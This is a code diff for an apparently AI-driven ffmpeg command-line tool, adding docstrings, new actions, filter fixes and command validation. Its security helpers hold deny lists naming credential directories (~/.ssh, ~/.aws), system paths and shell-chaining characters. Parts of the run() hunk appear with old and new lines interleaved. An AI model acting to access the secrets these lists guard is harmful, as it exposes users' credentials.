            cmd, check=True
        )  # nosec B603: fixed binary, no shell, args vetted
        if result.returncode != 0:
            raise ExecError(
                f"ffmpeg command failed with exit code {result.returncode}. "
                f"Common causes: (1) input file not found or corrupted, "
                f"(2) invalid output format or codec, "
                f"(3) insufficient disk space, "
                f"(4) permission issues. Check file paths and try again."
            )
        console.print(f"[green]Command {cmd_num} completed successfully[/green]")
    except subprocess.CalledProcessError as exc:
        logger.error("ffmpeg execution failed: %s", exc)
        raise ExecError(
            f"ffmpeg execution failed with error: {exc}. "
            f"Please verify: (1) input files exist and are readable, "
            f"(2) output directory is writable, "
            f"(3) ffmpeg is properly installed (try 'ffmpeg -version'), "
            f"(4) file formats are supported. "
            f"Use --verbose for detailed logging."
        ) from exc


def run(
@@ -73,62 +213,89 @@ def run(
    dry_run: bool,
    show_preview: bool = True,
    assume_yes: bool = False,
    output_dir: Path | None = None,
) -> int:
    """Execute ffmpeg commands with validation and error handling.

    Runs a list of ffmpeg commands with comprehensive validation,
    error handling, and user interaction. Supports dry-run mode
    for testing without actual execution.

    Args:
        commands: List of ffmpeg command lists to execute
        confirm: Whether user has confirmed execution
        dry_run: Whether to only preview without executing
        show_preview: Whether to show command preview
        assume_yes: Whether to skip confirmation prompts

    Returns:
        Exit code (0 for success, non-zero for failure)

    Raises:
        ExecError: When command execution fails or validation errors occur
    """
    if not commands:
        console.print("[yellow]⚠️ No commands to execute[/yellow]")
        return 0

    if show_preview:
        preview(commands)

    if dry_run:
        console.print(
            "[bold yellow]Dry run mode - no commands will be executed[/bold yellow]"
        )
        return 0

    if not confirm:
        console.print("[yellow]Execution cancelled by user[/yellow]")
        return 0

    # Check for overwrite conflicts before execution
    if not _check_overwrite_protection(commands, assume_yes):
        logger.info("Operation cancelled by user due to file conflicts")
        console.print("[yellow]Operation cancelled due to file conflicts[/yellow]")
        return 1

    for cmd in commands:
        # Validate command is not empty
        if not cmd:
            raise ExecError("Empty command received for execution.")
    # Execute commands with progress feedback
    total_commands = len(commands)
    successful_commands = 0

        # Validate executable exists to avoid PATH surprises
        ffmpeg_exec = cmd[0]
        resolved = shutil.which(ffmpeg_exec)
        if resolved is None:
            raise ExecError(
                f"Executable not found: {ffmpeg_exec}. Ensure it is installed and on PATH."
            )
    console.print(
        f"\n[bold green]Starting execution of {total_commands} command(s)...[/bold green]"
    )
    console.print()

        # Final security validation of the command
        from .io_utils import validate_ffmpeg_command

        if not validate_ffmpeg_command(cmd):
            logger.error(f"Command failed security validation: {' '.join(cmd[:3])}...")
            raise ExecError(
                "Command failed security validation. This could be due to: "
                "(1) unsafe file paths or arguments, "
                "(2) unsupported ffmpeg flags, "
                "or (3) potential security risks. "
                "Please check your input and try a simpler operation."
            )
    for i, cmd in enumerate(commands, 1):
        try:
            result = subprocess.run(cmd, check=True)  # nosec B603: fixed binary, no shell, args vetted
            if result.returncode != 0:
                raise ExecError(
                    f"ffmpeg command failed with exit code {result.returncode}. "
                    f"Common causes: (1) input file not found or corrupted, "
                    f"(2) invalid output format or codec, "
                    f"(3) insufficient disk space, "
                    f"(4) permission issues. Check file paths and try again."
                )
        except subprocess.CalledProcessError as exc:
            logger.error("ffmpeg execution failed: %s", exc)
            raise ExecError(
                f"ffmpeg execution failed with error: {exc}. "
                f"Please verify: (1) input files exist and are readable, "
                f"(2) output directory is writable, "
                f"(3) ffmpeg is properly installed (try 'ffmpeg -version'), "
                f"(4) file formats are supported. "
                f"Use --verbose for detailed logging."
            ) from exc
    return 0
            _execute_single_command(cmd, i, total_commands)
            successful_commands += 1
        except ExecError as e:
            console.print(f"[red]Command {i} failed:[/red] {e}")
            # Re-raise any command failure
            raise

    # Show final summary
    console.print()
    if successful_commands == total_commands:
        summary_panel = Panel(
            f"[bold green]All {total_commands} commands completed successfully![/bold green]",
            title="[bold green]Execution Summary[/bold green]",
            border_style="green",
        )
        console.print(summary_panel)

        # Show completion summary with generated files
        if output_dir:
            from .main import _display_completion_summary

            _display_completion_summary(output_dir)
    else:
        summary_panel = Panel(
            f"[yellow]{successful_commands}/{total_commands} commands completed successfully[/yellow]",
            title="[bold yellow]Execution Summary[/bold yellow]",
            border_style="yellow",
        )
        console.print(summary_panel)

    return 0 if successful_commands == total_commands else 1

@@ -1,3 +1,9 @@
"""File operations and security utilities for ai-ffmpeg-cli.

This module provides secure file handling operations including glob expansion,
path validation, filename sanitization, and ffmpeg command validation.
"""

from __future__ import annotations

import glob
@@ -8,9 +14,14 @@ if TYPE_CHECKING:
    from collections.abc import Iterable


def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None) -> list[Path]:
def expand_globs(
    patterns: Iterable[str], allowed_dirs: list[Path] | None = None
) -> list[Path]:
    """Expand glob patterns safely with path validation.

    Expands glob patterns while ensuring all resulting paths are safe
    and within allowed directories. Includes protection against DoS attacks.

    Args:
        patterns: Glob patterns to expand
        allowed_dirs: List of allowed directories to search within
@@ -22,6 +33,7 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
    - Validates all resulting paths for safety
    - Prevents access outside allowed directories
    - Limits recursive search depth
    - Prevents DoS via excessive glob results
    """
    if allowed_dirs is None:
        allowed_dirs = [Path.cwd()]
@@ -30,25 +42,25 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
    MAX_GLOB_RESULTS = 1000  # Prevent DoS via huge glob expansions

    for pattern in patterns:
        # Sanitize the pattern itself
        # Sanitize the pattern itself before expansion
        if not _is_safe_glob_pattern(pattern):
            continue

        try:
            matches = glob.glob(pattern, recursive=True)
            if len(matches) > MAX_GLOB_RESULTS:
                # Log warning and truncate
                # Log warning and truncate to prevent DoS
                matches = matches[:MAX_GLOB_RESULTS]

            for match in matches:
                path_obj = Path(match).resolve()

                # Validate each resulting path
                # Validate each resulting path against allowed directories
                if is_safe_path(path_obj, allowed_dirs):
                    paths.append(path_obj)

        except (OSError, ValueError):
            # Skip invalid patterns
            # Skip invalid patterns that cause errors
            continue

    # Remove duplicates while preserving order
@@ -64,19 +76,22 @@ def expand_globs(patterns: Iterable[str], allowed_dirs: list[Path] | None = None
def _is_safe_glob_pattern(pattern: str) -> bool:
    """Validate glob pattern is safe to use.

    Checks for dangerous patterns that could lead to security issues
    or excessive resource usage.

    Args:
        pattern: Glob pattern to validate

    Returns:
        bool: True if pattern is safe
        bool: True if pattern is safe for expansion
    """
    if not pattern or not isinstance(pattern, str):
        return False

    # Check for dangerous patterns
    # Check for dangerous patterns that could cause issues
    dangerous_sequences = [
        "../",
        "..\\",  # Path traversal
        "..\\",  # Path traversal attempts
        "//",
        "\\\\",  # Network paths
        "*" * 10,  # Excessive wildcards
@@ -88,7 +103,7 @@ def _is_safe_glob_pattern(pattern: str) -> bool:
        if dangerous in pattern_lower:
            return False

    # Check for system directory access
    # Check for system directory access attempts
    dangerous_roots = [
        "/etc",
        "/proc",
@@ -109,6 +124,9 @@ def _is_safe_glob_pattern(pattern: str) -> bool:
def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
    """Validate path is safe and within allowed directories.

    Comprehensive path validation that prevents access to sensitive
    system directories and ensures paths are within allowed boundaries.

    Args:
        path: Path to validate (str, Path, or other object)
        allowed_dirs: List of allowed parent directories (defaults to cwd)
@@ -121,6 +139,7 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
    - Blocks path traversal attempts (../, ..\\)
    - Validates against allowed directories
    - Prevents access to sensitive system paths
    - Handles both Unix and Windows path patterns
    """
    try:
        if path is None:
@@ -135,11 +154,11 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
        else:
            path_obj = path

        # Resolve to absolute path to detect traversal
        # Resolve to absolute path to detect traversal attempts
        try:
            resolved_path = path_obj.resolve()
        except (OSError, RuntimeError):
            # Path resolution failed - unsafe
            # Path resolution failed - consider unsafe
            return False

        # Check for empty or dangerous paths
@@ -153,33 +172,38 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:
            return False

        # Additional check for single character paths that could be roots
        if len(original_str.strip()) <= 3 and any(c in original_str for c in ["/", "\\"]):
        if len(original_str.strip()) <= 3 and any(
            c in original_str for c in ["/", "\\"]
        ):
            return False

        # Detect path traversal attempts
        # Detect path traversal attempts in path components
        path_parts = path_obj.parts
        if ".." in path_parts or any("." * 3 in part for part in path_parts):
            return False

        # Check for dangerous path patterns
        # Check for dangerous path patterns across different operating systems
        dangerous_patterns = [
            "/etc",
            "/proc",
            "/sys",
            "/dev",
            "/boot",  # Unix system dirs
            "/boot",  # Unix system directories
            "C:\\Windows",
            "C:\\System32",
            "C:\\Program Files",  # Windows system dirs
            "C:\\Program Files",  # Windows system directories
            "~/.ssh",
            "~/.aws",
            "~/.config",  # User sensitive dirs
            "~/.config",  # User sensitive directories
        ]

        path_lower = path_str.lower()
        for pattern in dangerous_patterns:
            try:
                if path_str.startswith(pattern) or Path(pattern).resolve() in resolved_path.parents:
                if (
                    path_str.startswith(pattern)
                    or Path(pattern).resolve() in resolved_path.parents
                ):
                    return False
            except (OSError, ValueError):
                # If we can't resolve the pattern, check string matching
@@ -215,16 +239,45 @@ def is_safe_path(path: object, allowed_dirs: list[Path] | None = None) -> bool:


def ensure_parent_dir(path: Path) -> None:
    """Ensure parent directory exists, creating it if necessary.

    Creates the parent directory structure for a given path
    if it doesn't already exist.

    Args:
        path: Path whose parent directory should be ensured
    """
    if path.parent and not path.parent.exists():
        path.parent.mkdir(parents=True, exist_ok=True)


def quote_path(path: Path) -> str:
    """Quote path for safe display in preview text.

    Returns a string representation of the path suitable
    for display purposes.

    Args:
        path: Path to quote

    Returns:
        String representation of the path
    """
    # Use simple quoting suitable for preview text; subprocess will bypass shell
    return str(path)


def most_recent_file(paths: Iterable[Path]) -> Path | None:
    """Find the most recently modified file from a collection.

    Compares modification times to find the newest file.

    Args:
        paths: Collection of file paths to check

    Returns:
        Path to the most recent file, or None if no valid files found
    """
    latest: tuple[float, Path] | None = None
    for p in paths:
        try:
@@ -239,9 +292,12 @@ def most_recent_file(paths: Iterable[Path]) -> Path | None:
def sanitize_filename(filename: str, max_length: int = 255) -> str:
    """Sanitize filename to prevent security issues.

    Removes dangerous characters and ensures the filename is safe
    for filesystem use across different operating systems.

    Args:
        filename: Original filename
        max_length: Maximum allowed length
        filename: Original filename to sanitize
        max_length: Maximum allowed length for the filename

    Returns:
        str: Sanitized filename safe for filesystem use
@@ -291,13 +347,13 @@ def sanitize_filename(filename: str, max_length: int = 255) -> str:
    if name_without_ext in reserved_names:
        sanitized = f"safe_{sanitized}"

    # Truncate if too long
    # Truncate if too long while preserving extension
    if len(sanitized) > max_length:
        name, ext = sanitized.rsplit(".", 1) if "." in sanitized else (sanitized, "")
        max_name_length = max_length - len(ext) - 1 if ext else max_length
        sanitized = name[:max_name_length] + ("." + ext if ext else "")

    # Ensure we have something
    # Ensure we have something valid
    if not sanitized:
        sanitized = "sanitized_file"

@@ -323,6 +379,8 @@ ALLOWED_FFMPEG_FLAGS = {
    "-s",
    "-vframes",
    "-vn",
    "-frame_pts",
    "-frame_pkt_pts",
    # Audio codecs and options
    "-c:a",
    "-acodec",
@@ -378,8 +436,11 @@ ALLOWED_FFMPEG_FLAGS = {
def validate_ffmpeg_command(cmd: list[str]) -> bool:
    """Validate ffmpeg command arguments for security.

    Ensures the command is safe to execute by checking for dangerous
    patterns and validating all arguments against an allowlist.

    Args:
        cmd: Command arguments list
        cmd: Command arguments list to validate

    Returns:
        bool: True if command is safe to execute
@@ -388,7 +449,8 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
    - Validates executable is ffmpeg
    - Checks all flags against allowlist
    - Validates file paths
    - Prevents command injection
    - Prevents command injection and chaining
    - Blocks dangerous shell operations
    """
    if not cmd or not isinstance(cmd, list):
        return False
@@ -397,12 +459,9 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
    if not cmd[0] or cmd[0] != "ffmpeg":
        return False

    # Check for dangerous patterns
    cmd_str = " ".join(cmd)
    # Check for dangerous patterns, but allow semicolons in filter values
    dangerous_patterns = [
        ";",
        "|",
        "&",
        "&&",
        "||",  # Command chaining
        "$",
@@ -417,11 +476,43 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
        "\r",  # Line breaks
    ]

    for pattern in dangerous_patterns:
        if pattern in cmd_str:
            return False
    # Check for dangerous patterns, but allow semicolons in filter values
    for i, arg in enumerate(cmd):
        # Check if this is a filter value (follows a filter flag)
        is_filter_value = (
            i > 0
            and cmd[i - 1].startswith("-")
            and cmd[i - 1]
            in [
                "-vf",
                "-filter:v",
                "-af",
                "-filter:a",
                "-filter_complex",
                "-lavfi",
            ]
        )

    # Validate flags
        if is_filter_value:
            # Skip semicolon validation for filter values, but check other patterns
            patterns_to_check = [p for p in dangerous_patterns if p != ";"]
        else:
            # Check all dangerous patterns including semicolons for non-filter values
            patterns_to_check = dangerous_patterns + [";"]

        for pattern in patterns_to_check:
            if pattern in arg:
                return False

    # Check for standalone & (command backgrounding) but allow & in filter parameters
    # Look for & that's not part of a filter parameter (like &H80000000)
    import re

    cmd_str = " ".join(cmd)
    if re.search(r"(?<!H)\b&\b(?!H)", cmd_str):
        return False

    # Validate flags against allowlist
    i = 1  # Skip 'ffmpeg'
    while i < len(cmd):
        arg = cmd[i]
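The key behavioral change in this hunk is per-argument scanning: semicolons stay forbidden everywhere except in the value immediately following a filter flag, where ffmpeg's filtergraph syntax legitimately uses `;` as a chain separator. A minimal sketch isolating just that rule (the helper name `has_unsafe_semicolon` is mine; the real validator checks many more patterns):

```python
# Filter flags whose following argument may legitimately contain ';'
# (ffmpeg filtergraph chain separator).
FILTER_FLAGS = ["-vf", "-filter:v", "-af", "-filter:a", "-filter_complex", "-lavfi"]


def has_unsafe_semicolon(cmd: list[str]) -> bool:
    # Reject ';' in any argument that is not a filter value, since elsewhere
    # it could indicate attempted shell command chaining.
    for i, arg in enumerate(cmd):
        is_filter_value = i > 0 and cmd[i - 1] in FILTER_FLAGS
        if ";" in arg and not is_filter_value:
            return True
    return False


print(has_unsafe_semicolon(
    ["ffmpeg", "-i", "in.mp4", "-vf", "scale=640:-1;fps=30", "out.mp4"]
))  # False
print(has_unsafe_semicolon(
    ["ffmpeg", "-i", "in.mp4; rm -rf /", "out.mp4"]
))  # True
```

Because the command is executed as an argument list without a shell, a `;` in a path cannot actually chain commands; the check is defense in depth against paths that were assembled from untrusted text.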
@@ -449,9 +540,12 @@ def validate_ffmpeg_command(cmd: list[str]) -> bool:
def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
    """Sanitize user input to prevent injection attacks.

    Removes dangerous characters and patterns that could be used
    for command injection or other security attacks.

    Args:
        user_input: Raw user input string
        max_length: Maximum allowed length
        user_input: Raw user input string to sanitize
        max_length: Maximum allowed length for the input

    Returns:
        str: Sanitized input safe for processing
@@ -459,7 +553,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
    if not user_input or not isinstance(user_input, str):
        return ""

    # Truncate if too long
    # Truncate if too long to prevent buffer overflow attacks
    if len(user_input) > max_length:
        user_input = user_input[:max_length]

@@ -475,7 +569,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
    for char in dangerous_chars:
        sanitized = sanitized.replace(char, " ")

    # Remove dangerous command patterns
    # Remove dangerous command patterns that could be used for injection
    dangerous_patterns = [
        r"\brm\s+",
        r"\bmv\s+",
@@ -496,7 +590,7 @@ def sanitize_user_input(user_input: str, max_length: int = 1000) -> str:
    for pattern in dangerous_patterns:
        sanitized = re.sub(pattern, " ", sanitized, flags=re.IGNORECASE)

    # Normalize whitespace
    # Normalize whitespace to prevent encoding issues
    sanitized = " ".join(sanitized.split())

    return sanitized
@@ -1,3 +1,9 @@
"""Intent models for ai-ffmpeg-cli.

This module defines the data models for representing ffmpeg intents
and command plans, including validation and type conversion logic.
"""

from __future__ import annotations

from enum import Enum
@@ -9,6 +15,17 @@ from pydantic import model_validator


def _seconds_to_timestamp(value: float | int | str) -> str:
    """Convert seconds to HH:MM:SS[.ms] timestamp format.

    Converts numeric seconds to ffmpeg-compatible timestamp format,
    handling both integer and float inputs.

    Args:
        value: Seconds as number or string

    Returns:
        Timestamp string in HH:MM:SS[.ms] format
    """
    try:
        seconds_float = float(value)
    except Exception:
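The body of `_seconds_to_timestamp` is truncated by the hunk above, so the following is only a plausible sketch of the conversion its docstring describes; the exact zero-padding and millisecond handling are assumptions, not the repository's implementation:

```python
def seconds_to_timestamp(value) -> str:
    # Convert numeric seconds (int, float, or numeric string) into an
    # ffmpeg-style HH:MM:SS[.ms] timestamp. Padding behavior is assumed.
    seconds_float = float(value)
    hours = int(seconds_float // 3600)
    minutes = int((seconds_float % 3600) // 60)
    seconds = seconds_float % 60
    if seconds == int(seconds):
        return f"{hours:02d}:{minutes:02d}:{int(seconds):02d}"
    return f"{hours:02d}:{minutes:02d}:{seconds:06.3f}"


print(seconds_to_timestamp(90))      # 00:01:30
print(seconds_to_timestamp(3661.5))  # 01:01:01.500
```

ffmpeg's `-ss`/`-t` options accept this `HH:MM:SS[.ms]` form, which is why the intent model normalizes numeric inputs into it before commands are built.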
|
||||
@@ -26,6 +43,8 @@ def _seconds_to_timestamp(value: float | int | str) -> str:


 class Action(str, Enum):
+    """Supported ffmpeg actions for intent processing."""
+
     convert = "convert"
     extract_audio = "extract_audio"
     remove_audio = "remove_audio"
@@ -33,11 +52,19 @@ class Action(str, Enum):
     segment = "segment"
     thumbnail = "thumbnail"
     frames = "frames"
+    extract_frames = "extract_frames"
     compress = "compress"
     overlay = "overlay"
+    format_convert = "format_convert"


 class FfmpegIntent(BaseModel):
+    """Represents a parsed ffmpeg intent with all parameters.
+
+    This model captures the user's intent for ffmpeg operations,
+    including action type, input/output files, and processing parameters.
+    """
+
     action: Action
     inputs: list[Path] = Field(default_factory=list)
     output: Path | None = None
@@ -55,23 +82,42 @@ class FfmpegIntent(BaseModel):
     fps: str | None = None
     glob: str | None = None
     extra_flags: list[str] = Field(default_factory=list)
+    quality: str | None = None  # For quality settings
+    format: str | None = None  # For format conversion

     @model_validator(mode="before")
     @classmethod
     def _coerce_lists(cls, values: object) -> object:
+        """Pre-validate and coerce input values to proper types.
+
+        Handles type conversion for lists and timestamp formatting
+        before model validation.
+
+        Args:
+            values: Raw input values
+
+        Returns:
+            Processed values with proper types
+        """
         if not isinstance(values, dict):
             return values
-        # inputs: allow scalar -> [scalar]
+        # inputs: allow scalar -> [scalar] or None -> []
         inputs = values.get("inputs")
-        if inputs is not None and not isinstance(inputs, list):
+        if inputs is None:
+            values["inputs"] = []
+        elif not isinstance(inputs, list):
             values["inputs"] = [inputs]
-        # filters: allow scalar -> [str(scalar)]
+        # filters: allow scalar -> [str(scalar)] or None -> []
         filters = values.get("filters")
-        if filters is not None and not isinstance(filters, list):
+        if filters is None:
+            values["filters"] = []
+        elif not isinstance(filters, list):
             values["filters"] = [str(filters)]
-        # extra_flags: allow scalar -> [str(scalar)]
+        # extra_flags: allow scalar -> [str(scalar)] or None -> []
         extra_flags = values.get("extra_flags")
-        if extra_flags is not None and not isinstance(extra_flags, list):
+        if extra_flags is None:
+            values["extra_flags"] = []
+        elif not isinstance(extra_flags, list):
             values["extra_flags"] = [str(extra_flags)]

         # start/end: allow numeric seconds -> HH:MM:SS[.ms]
@@ -79,10 +125,30 @@ class FfmpegIntent(BaseModel):
             values["start"] = _seconds_to_timestamp(values["start"])
         if "end" in values and not isinstance(values.get("end"), str):
             values["end"] = _seconds_to_timestamp(values["end"])

+        # fps: allow numeric values -> string
+        if "fps" in values and not isinstance(values.get("fps"), str):
+            values["fps"] = str(values["fps"])
+
+        # glob: allow any value -> string or None
+        if "glob" in values and values.get("glob") is not None:
+            values["glob"] = str(values["glob"])
+
         return values
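The `_coerce_lists` validator above normalizes scalars and `None` into lists before pydantic validation runs. A minimal stdlib sketch of that coercion logic (the function name and plain-dict interface are illustrative, not the project's API):

```python
def coerce_lists(values):
    """Coerce scalar or None inputs/filters/extra_flags into lists (sketch)."""
    if not isinstance(values, dict):
        return values
    # (key, whether scalars should be stringified) pairs mirroring the validator
    for key, to_str in (("inputs", False), ("filters", True), ("extra_flags", True)):
        if key in values:
            val = values[key]
            if val is None:
                values[key] = []
            elif not isinstance(val, list):
                values[key] = [str(val) if to_str else val]
    return values

print(coerce_lists({"inputs": "a.mp4", "filters": None}))
# {'inputs': ['a.mp4'], 'filters': []}
```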

     @model_validator(mode="after")
     def _validate(self) -> FfmpegIntent:
+        """Post-validate the intent for logical consistency.
+
+        Ensures that required fields are present for each action type
+        and that incompatible combinations are caught.
+
+        Returns:
+            Self if validation passes
+
+        Raises:
+            ValueError: When validation fails
+        """
         if self.action == Action.overlay and not self.overlay_path:
             raise ValueError("overlay requires overlay_path")

@@ -91,12 +157,22 @@ class FfmpegIntent(BaseModel):
         ):
             raise ValueError("trim/segment requires start+end or duration")

-        if self.action in {Action.convert, Action.compress} and not self.inputs:
-            raise ValueError("convert/compress requires at least one input")
+        if (
+            self.action in {Action.convert, Action.compress, Action.format_convert}
+            and not self.inputs
+        ):
+            raise ValueError("convert/compress/format_convert requires at least one input")

         if self.action == Action.extract_audio and not self.inputs:
             raise ValueError("extract_audio requires an input file")

+        # Add validation for new actions
+        if self.action == Action.extract_frames and not self.fps:
+            raise ValueError("extract_frames requires fps parameter")
+
+        if self.action == Action.format_convert and not self.format:
+            raise ValueError("format_convert requires format parameter")
+
         # Ensure incompatible combos are caught
         if self.action == Action.thumbnail and self.fps:
             raise ValueError("thumbnail is incompatible with fps; use frames action")
@@ -105,6 +181,12 @@ class FfmpegIntent(BaseModel):


 class CommandEntry(BaseModel):
+    """Represents a single ffmpeg command with its parameters.
+
+    Contains all information needed to execute a single ffmpeg command,
+    including input/output files and command arguments.
+    """
+
     input: Path
     output: Path
     args: list[str] = Field(default_factory=list)
@@ -112,5 +194,11 @@ class CommandEntry(BaseModel):


 class CommandPlan(BaseModel):
+    """Represents a complete plan of ffmpeg commands to execute.
+
+    Contains a human-readable summary and a list of command entries
+    that will be executed in sequence.
+    """
+
     summary: str
     entries: list[CommandEntry]
@@ -1,4 +1,4 @@
-"""Natural language schema definitions for ai-ffmpeg-cli.
+"""Extended natural language schema definitions for ai-ffmpeg-cli.

 This module defines the core data structures used for parsing and representing
 user intents in natural language form. It provides Pydantic models for type
@@ -155,6 +155,15 @@ class FfmpegIntent(BaseModel):
             values["start"] = _seconds_to_timestamp(values["start"])
         if "end" in values and not isinstance(values.get("end"), str):
             values["end"] = _seconds_to_timestamp(values["end"])

+        # fps: allow numeric values -> string
+        if "fps" in values and not isinstance(values.get("fps"), str):
+            values["fps"] = str(values["fps"])
+
+        # glob: allow any value -> string or None
+        if "glob" in values and values.get("glob") is not None:
+            values["glob"] = str(values["glob"])
+
         return values

     @model_validator(mode="after")
@@ -182,9 +191,7 @@ class FfmpegIntent(BaseModel):
             self.action in {Action.convert, Action.compress, Action.format_convert}
             and not self.inputs
         ):
-            raise ValueError(
-                "convert/compress/format_convert requires at least one input"
-            )
+            raise ValueError("convert/compress/format_convert requires at least one input")

         if self.action == Action.extract_audio and not self.inputs:
             raise ValueError("extract_audio requires an input file")
@@ -1,42 +1,187 @@
 """Intent routing and command plan generation for ai-ffmpeg-cli.

 This module handles the conversion of parsed ffmpeg intents into executable
 command plans, including security validation and filter optimization.
 """

 from __future__ import annotations

 from pathlib import Path

-from .errors import BuildError
-from .io_utils import expand_globs
-from .nl_schema import Action
-from .nl_schema import CommandEntry
-from .nl_schema import CommandPlan
-from .nl_schema import FfmpegIntent
+from .custom_exceptions import BuildError
+from .file_operations import expand_globs
+from .intent_models import Action
+from .intent_models import CommandEntry
+from .intent_models import CommandPlan
+from .intent_models import FfmpegIntent


-def _derive_output_name(input_path: Path, intent: FfmpegIntent) -> Path:
-    if intent.output:
-        return intent.output
-    stem = input_path.stem
-    suffix = input_path.suffix
-    if intent.action == Action.extract_audio:
-        return input_path.with_suffix(".mp3")
-    if intent.action == Action.thumbnail:
-        return input_path.with_name("thumbnail.png")
-    if intent.action == Action.frames:
-        return input_path.with_name(f"{stem}_frame_%04d.png")
-    if intent.action == Action.trim:
-        return input_path.with_name("clip.mp4")
-    if intent.action == Action.remove_audio:
-        return input_path.with_name(f"{stem}_mute.mp4")
-    if intent.action == Action.overlay:
-        return input_path.with_name(f"{stem}_overlay.mp4")
-    if intent.action in {Action.convert, Action.compress}:
-        return input_path.with_suffix(".mp4")
-    return input_path.with_suffix(suffix)
-
-
-def route_intent(intent: FfmpegIntent, allowed_dirs: list[Path] | None = None) -> CommandPlan:
-    """Route FfmpegIntent to CommandPlan with security validation.
-
-    Args:
-        intent: Parsed user intent
+def _validate_and_fix_scale_filter(scale_filter: str | None) -> str | None:
+    """Validate and fix scale filter to ensure even dimensions for H.264/H.265 compatibility.
+
+    H.264 and H.265 codecs require even dimensions for proper encoding.
+    This function ensures scale filters produce even width and height values.
+
+    Args:
+        scale_filter: The scale filter string (e.g., "scale=iw*9/16:ih")
+
+    Returns:
+        Fixed scale filter that ensures even dimensions, or original if no fixes needed
+    """
+    if not scale_filter or not scale_filter.startswith("scale="):
+        return scale_filter
+
+    # Extract the scale parameters (remove "scale=" prefix)
+    scale_params = scale_filter[6:]
+
+    # Check if it's a simple width:height format
+    if ":" in scale_params and not any(op in scale_params for op in ["*", "/", "+", "-"]):
+        # Simple format like "1280:720" - ensure even numbers
+        parts = scale_params.split(":")
+        if len(parts) >= 2:
+            try:
+                width = int(parts[0])
+                height = int(parts[1])
+                # Make sure both dimensions are even for codec compatibility
+                if width % 2 != 0:
+                    width -= 1
+                if height % 2 != 0:
+                    height -= 1
+                # Reconstruct the scale filter with additional parameters if any
+                result = f"scale={width}:{height}"
+                if len(parts) > 2:
+                    result += ":" + ":".join(parts[2:])
+                # Add force_original_aspect_ratio=decrease if not already present
+                if "force_original_aspect_ratio" not in result:
+                    result += ":force_original_aspect_ratio=decrease"
+                return result
+            except ValueError:
+                # If parsing fails, return original filter
+                pass
+
+    # For aspect ratio changes that might result in odd dimensions,
+    # use a more robust approach that ensures even dimensions
+    if "9/16" in scale_params or "16/9" in scale_params:
+        # For 9:16 aspect ratio conversions, use a safer approach
+        if "ih*9/16:ih" in scale_params:
+            # Instead of calculating width from height, calculate height from width
+            # This is more likely to result in even dimensions
+            return "scale=iw:iw*16/9:force_original_aspect_ratio=decrease"
+        elif "iw*16/9:iw" in scale_params:
+            # For 16:9 aspect ratio
+            return "scale=iw:iw*9/16:force_original_aspect_ratio=decrease"
+
+    # For other complex expressions, add force_original_aspect_ratio=decrease to help FFmpeg
+    # handle dimension calculations more safely, but only if not already present
+    if "force_original_aspect_ratio" not in scale_params:
+        return f"scale={scale_params}:force_original_aspect_ratio=decrease"
+
+    return scale_filter

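The even-dimension requirement that `_validate_and_fix_scale_filter` enforces can be shown in isolation; a tiny sketch (a hypothetical helper for illustration, not part of the diff):

```python
def ensure_even(width, height):
    """Round width/height down to even values, as H.264/H.265 encoders require."""
    return width - (width % 2), height - (height % 2)

print(ensure_even(1281, 721))  # (1280, 720)
```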
+def _validate_and_fix_filter_chain(filter_chain: list[str]) -> list[str]:
+    """Validate and fix a chain of filters, ensuring proper handling of scale filters.
+
+    Applies validation specifically to scale filters while preserving
+    other filters without modification.
+
+    Args:
+        filter_chain: List of filter strings to validate
+
+    Returns:
+        Fixed filter chain with validated scale filters
+    """
+    validated_filters = []
+
+    for filter_item in filter_chain:
+        if filter_item.startswith("scale="):
+            # Apply scale filter validation for even dimensions
+            fixed_filter = _validate_and_fix_scale_filter(filter_item)
+            if fixed_filter:
+                validated_filters.append(fixed_filter)
+        else:
+            # For non-scale filters, don't add force_original_aspect_ratio=decrease
+            # as it's not supported by most filters
+            validated_filters.append(filter_item)
+
+    return validated_filters

+def _derive_output_name(
+    input_path: Path, intent: FfmpegIntent, output_dir: Path | None = None
+) -> Path:
+    """Derive output filename based on intent and input file.
+
+    Generates appropriate output filenames based on the action type,
+    ensuring descriptive names that avoid overwriting input files.
+
+    Args:
+        input_path: Input file path
+        intent: Parsed ffmpeg intent
+        output_dir: Output directory path (optional, defaults to input directory)
+
+    Returns:
+        Output file path with appropriate name and extension
+    """
+    if intent.output and intent.output != input_path:
+        # If output is specified, use it but potentially move to output directory
+        if output_dir:
+            return output_dir / intent.output.name
+        return intent.output
+
+    stem = input_path.stem
+    suffix = input_path.suffix
+
+    # Determine output directory
+    target_dir = output_dir if output_dir else input_path.parent
+
+    # Generate action-specific output names
+    if intent.action == Action.extract_audio:
+        return target_dir / f"{stem}.mp3"
+    if intent.action == Action.thumbnail:
+        return target_dir / "thumbnail.png"
+    if intent.action == Action.frames:
+        return target_dir / f"{stem}_frame_%04d.png"
+    if intent.action == Action.extract_frames:
+        return target_dir / f"{stem}_frames_%04d.png"
+    if intent.action == Action.trim:
+        return target_dir / "clip.mp4"
+    if intent.action == Action.remove_audio:
+        return target_dir / f"{stem}_mute.mp4"
+    if intent.action == Action.overlay:
+        return target_dir / f"{stem}_overlay.mp4"
+    if intent.action in {Action.convert, Action.compress}:
+        # Generate a descriptive output name to avoid overwriting input
+        return target_dir / f"{stem}_converted.mp4"
+    if intent.action == Action.format_convert:
+        # Use the format from the intent to determine the extension
+        if intent.format:
+            # Map common formats to extensions
+            format_extensions = {
+                "webm": ".webm",
+                "avi": ".avi",
+                "mkv": ".mkv",
+                "mov": ".mov",
+                "mp4": ".mp4",
+            }
+            extension = format_extensions.get(intent.format, f".{intent.format}")
+            return target_dir / f"{stem}{extension}"
+        return target_dir / f"{stem}{suffix}"
+    return target_dir / f"{stem}{suffix}"

+def route_intent(
+    intent: FfmpegIntent, allowed_dirs: list[Path] | None = None, output_dir: Path | None = None
